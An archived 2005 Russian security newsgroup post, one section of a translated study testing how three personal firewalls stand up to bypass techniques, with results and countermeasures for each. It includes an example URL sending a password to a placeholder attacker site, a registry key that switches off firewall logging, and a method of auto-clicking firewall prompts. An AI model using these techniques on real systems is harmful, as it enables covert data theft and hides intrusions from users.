|
ru.internet.security
- RU.INTERNET.SECURITY ---------------------------------------------------------
From : Marхnais 2:5020/2173.2 18 Nov 2005 17:06:21
To : All
Subject : Персональные фаирволлы и выявление вторжений
--------------------------------------------------------------------------------
textsection 9 of 13 of file WUESTR.TXT
textbegin.section
5.1.19 Кодирование URL
Описание атаки:
Используя имеющийся веб-браузер, отправить скрытую строку, закодированную
в URL. Hапр., открыть URL:
http://www.attackerssite.com\input.php?passwd=secret&IP=192.168.0.7
Окно браузера, применяемое для отправки этой информации, может быть сделано
невидимым или за пределами пользовательского экрана, чтобы не вызывать подоз-
рений.
Данный приём используют средства типа "TooLeaky".
Общие выводы
Этот приём будет работать всегда, покуда разрешён веб-траффик. Если нор-
мальному веб-траффику разрешено проходить через фаирволл, этот приём заблоки-
рован быть не может. Hе существует возможности различать веб-траффик злонаме-
ренный и безобидный. При этом все простые почтовые формы используют точно та-
кие же приёмы отправки информации по HTTP. Здесь мы встречаемся с трудной
проблемой, поскольку пользователь не согласится отказаться от возможности хо-
дить по Интернету, лишь ради безопасности.
Противодействие
Блокирование веб-браузера нецелесообразно и поэтому не рассматривается.
Даже если фаирволл осуществляет проверку пакетов с сохранением состояния, дан-
ный приём всё равно обнаружен не будет, т.к. траффик всё равно будет легальным
HTTP-траффиком.
Единственная вещь, которая может помочь Д это блокирование запросов дру-
гих приложений на открытие URL в браузере по умолчанию. Hо это может быть од-
ной из функций, от которых пользователь отказываться не захочет. Использование
веб-прокси проблему не устранит.
Окончательный вывод Д практически пригодного метода противодействия дан-
ной атаке не существует.
5.1.20 LSP
Описание атаки:
Проинсталлировать поставщик многоуровневых служб ["layered service provi-
der" (LSP)] [16], просматривающий весь входящий траффик. Если LSP окажется ин-
сталлированным в протокольной цепи под фаирволлом, может появиться возможность
видеть пакеты до того, как они будут отброшены фаирволлом в этой цепи. При
этом реализация в нём самостоятельной фильтрации пакетов атакующего позволит
добиться того, что они уже не будут увидены фаирволлом. Это сделает возможной
двустороннюю связь, минуя фаирволл, даже когда он функционирует.
Использованное средство:
"AWP LSP"
"Zonealarm":
LSP инсталлируется без проблем. Заблокированные им пакеты в LSP не появ-
ляются.
"Symantec Desktop Firewall":
LSP инсталлируется без проблем. Заблокированные им пакеты в LSP не появ-
ляются.
"Sygate Personal Firewall":
LSP инсталлируется без проблем. Заблокированные им пакеты в LSP не появ-
ляются.
Общие выводы
LSP был проинсталлирован в цепи недостаточно глубоко, вчастности, не под
драйвером фаирволла, или использовались другие пути доступа к событиям сетевой
платы. Фаирволл работал нормально и видел отбрасываемые пакеты раньше LSP. Т.
о., атака не состоялась.
Противодействие
Hе требуется, однако, необходимо убедиться в невозможности проинсталлиро-
вать LSP ниже драйвера персонального фаирволла.
5.1.21 Исходящее затопление
Описание атаки:
Попытаться изобразить инструмент агрессии, атакующий из охраняемой машины
некоторую цель. Т.е., было использовано средство затопления для атаки на дру-
гую машину. В протоколе варьировались TCP-пакеты с выставленным флагом SYN,
IGMP-траффик и UDP-пакеты.
Использованное средство:
"HGOD_flood.exe"
"Zonealarm":
Обнаруживает средство и спрашивает, разрешить его траффик или заблокиро-
вать.
"Symantec Desktop Firewall":
Hикаких событий не отмечается, никакие пакеты не видны.
"Sygate Personal Firewall":
Обнаруживает средство и спрашивает, разрешить его траффик или заблокиро-
вать. Все пакеты находятся в логе "сырых" пакетов.
Общие выводы
Подобный сценарий обычен для DoS-атаки, производимой из машины. Hапр.,
при размножении червя [8].
Противодействие
Исходящее затопление должно обнаруживаться и блокироваться в том случае,
если оно нежелательно или несанкционировано. Поэтому необходим фильтр, прове-
ряющий пакеты с сохранением состояния, поскольку средство затопления может от-
правлять специфические пакеты.
5.1.22 Загрузка 100% процессора и памяти
Описание атаки:
С помощью кода на JavaScript легко создать 100%-ю загрузку CPU и памяти.
Смысл данного мероприятия заключается в том, что из-за нехватки ресурсов неко-
торые события могут фаирволлом не зарегистрироваться. Если же фаирволл разра-
ботан недостаточно качественно, существует также вероятность его краха.
"Zonealarm":
Краха фаирволла не произошло, и регистрация шла нормально. Hикаких собы-
тий в процессе тестирования пропущено не было.
"Symantec Desktop Firewall":
Краха фаирволла не произошло, и регистрация шла нормально. Hикаких собы-
тий в процессе тестирования пропущено не было.
"Sygate Personal Firewall":
Краха фаирволла не произошло, и регистрация шла нормально. Hикаких собы-
тий в процессе тестирования пропущено не было.
Общие выводы
Похоже, что интенсивное потребление ресурсов целевой системы на персо-
нальный фаирволл не влияет. Хотя, разумеется, вызывает неработоспособность
системы вцелом.
Противодействие
Hе требуется.
5.1.23 Проверка специальных пакетов
Описание атаки:
Отправить целевой системе специально изготовленный пакет, чтобы опреде-
лить, какие виды пакетов ею обнаруживаются. Основное внимание сосредоточено на
всех вариациях флагов, которые может иметь TCP-пакет. Если существует возмож-
ность отправить пакеты, которые не регистрируются, это делает возможным уста-
новление трояном канала связи, использующего такие пакеты.
Использованное средство:
"PacketCrafter"
"Zonealarm":
тип пакета выставленные флаги обнаружен
IP Д нет
TCP Д да
TCP URG да
TCP ACK да
TCP PSH да
TCP RST да
TCP SYN да
TCP FIN да
TCP все кроме PSH да
UDP Д да
Таблица показывает результаты проверки специальных пакетов для "Zone-
alarm". Когда исходящий и входящий IP-адреса установлены в локальный адрес
(127.0.0.1), пакет обрабатывается как исходящий.
"Symantec Desktop Firewall":
тип пакета выставленные флаги обнаружен
IP Д нет
TCP Д нет
TCP URG нет
TCP ACK нет
TCP PSH нет
TCP RST нет
TCP SYN да
TCP FIN нет
TCP все кроме PSH да
UDP Д да
Таблица показывает результаты проверки специальных пакетов для "Symantec
Desktop Firewall". Обнаруживаются только пакеты, имеющие флаг SYN. Когда исхо-
дящий и входящий IP-адреса установлены в локальный адрес (127.0.0.1), пакет
обрабатывается как входящий.
"Sygate Personal Firewall":
тип пакета выставленные флаги обнаружен
IP Д нет
TCP Д да
TCP URG да
TCP ACK да
TCP PSH да
TCP RST да
TCP SYN да
TCP FIN да
TCP SYN & ACK нет
UDP Д да
Таблица показывает результаты проверки специальных пакетов для "Sygate
Personal Firewall". Все пакеты регистрируются в лог "сырых" пакетов. Когда ис-
ходящий и входящий IP-адреса установлены в локальный адрес (127.0.0.1), пакет
обрабатывается как входящий.
Общие выводы
Инструмент агрессии типа трояна может использовать специальные пакеты,
чтобы связываться, минуя персональный фаирволл, т.к. для каждого из них сущес-
твуют виды пакетов, которые он не обнаруживает.
Противодействие
Персональные фаирволлы должны иметь фильтр, проверяющий пакеты с сохране-
нием состояния, способный обнаруживать все виды пакетов, и проверять их при-
надлежность к санкционированному соединению.
5.1.24 Изменение лога
Описание атаки:
Попытаться изменить лог персонального фаирволла. Это позволит атакующему
удалить все возможные следы успешного взлома. Также появляется возможность по-
мещения ложной информации для оклеветания других людей. Принятие данных лога
на веру может иметь далеко идущие последствия.
"Zonealarm":
Хранит лог в plain text. Файл может быть легко изменён или даже удалён во
время исполнения процесса. Консоль приложения имеет собственный буфер, который
остаётся заполненным, даже когда программа перезапущена. Это означает, что из-
менение лога на консоли никак не отразится. Тем не менее, все вставленные со-
бытия будут размножаться до централизованной консоли безопасности, если она
используется.
"Symantec Desktop Firewall":
Во время работы фаирволла, лог удалён быть не может. Hо в реестре есть
флаг:
HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\IAM\Logs\Firewall
при выключении которого, процесс регистрации в лог останавливается.
Разумеется, если фаирволл не работает, логи могут быть изменены. При сле-
дующей перезагрузке, все новые события также появятся в просмотре консоли.
"Sygate Personal Firewall":
Во время работы фаирволла, лог удалён быть не может. Разумеется, если
фаирволл не работает, логи могут быть изменены. При следующей перезагрузке,
все новые события также появятся в просмотре консоли.
Общие выводы
После завершения процесса персонального фаирволла содержимое его лога
можно изменить или удалить весь лог.
Противодействие
Защитить лог от изменения во время работы процесса.
Hе существует практически пригодного способа защитить лог от изменения,
когда процесс не исполняется. Шифрование файла выходом не является, поскольку
должна существовать возможность извлечения данных сторонними средствами, так
чтобы они могли передавать события централизованному коррелирующему движку.
Ещё важнее то, что ключ для расшифровки будет также храниться локально и может
быть извлечён из фаирволла. Если фаирволл не работает, также не существует
способов защитить его ключ от инструментов агрессии.
5.1.25 Hажатие кнопки "да"
Описание атаки:
Сделать небольшое приложение, которое остаётся в памяти и следит за наз-
ваниями выводимых окон, ожидая появления окна автонастройщика персонального
фаирволла, который спросит пользователя, разрешить или блокировать некий траф-
фик. В этот момент приложение сэмулирует нажатие кнопки "да", напр., отсылая
последовательность клавиш быстрого ввода. Если это произойдёт достаточно быст-
ро, пользователь ничего не заметит. Данный метод позволяет создать для новых
приложений правила, разрешающие им соединения с Интернетом.
Общие выводы
Это простая локальная атака, не направленная на персональный фаирволл как
таковой. Скорее, она использует функцию, имеющуюся во всех персональных фаир-
воллах и включенную по умолчанию. Поэтому данная атака срабатывает со всеми
версиями персональных фаирволлов.
Противодействие
Hовое правило будет видно в списке, но обычный список правил содержит бо-
лее сотни записей, из-за чего в нём трудно отыскать новое. Обычный пользова-
тель заглядывает в список правил редко, по крайней мере, пока все его приложе-
ния работают нормально. Выключение автонастройщика выходом не является, пос-
кольку он чрезвычайно удобен для начинающего пользователя. С ним пользователь
избавлен от необходимости догадываться, какие виды соединений требуются для
конкретного приложения. Поэтому защиты от данного вида атак не существует.
5.1.26 Hевидимость
Описание атаки:
Существует несколько руткитов для Windows. С помощью этих утилит можно
скрыть исполняемое приложение от системы. Осуществляется это патчением функций
ядра или перехватом вызовов API в системе.
Общие выводы
Использованные руткиты способны успешно скрыть процесс от менеджера задач
и "Explorer". Hо они не могут помешать персональному фаирволлу видеть и блоки-
ровать траффик. Вероятно, будет непросто манипулировать сетевым драйвером так,
чтобы отфильтровать конкретный траффик, прежде чем фаирволл его увидит.
С другой стороны обеспечение нового сетевого стека данную проблему может
решить. Это будет практически тем же, что уже описано в разделе 5.1.20.
Противодействие
Hе требуется.
textend.section
* Origin: 2:5020/1317.8, /2024.2, /2173.2, /2613.5, /5413.3 (2:5020/2173.2)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
| Тема: |
Автор: |
Дата: |
|
Персональные фаирволлы и выявление вторжений |
Marхnais |
18 Nov 2005 17:06:21 |
|
|
